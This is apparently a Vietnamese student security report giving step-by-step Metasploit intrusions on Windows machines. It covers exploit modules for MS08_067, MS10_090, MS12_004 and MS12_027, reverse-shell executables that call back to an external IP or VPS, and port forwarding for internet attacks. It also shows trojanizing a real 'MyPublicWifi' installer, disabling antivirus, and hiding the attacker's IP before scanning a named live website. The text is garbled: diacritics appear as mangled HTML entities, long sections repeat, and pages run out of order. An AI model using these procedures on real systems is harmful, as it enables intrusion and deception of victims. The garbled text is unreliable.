sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
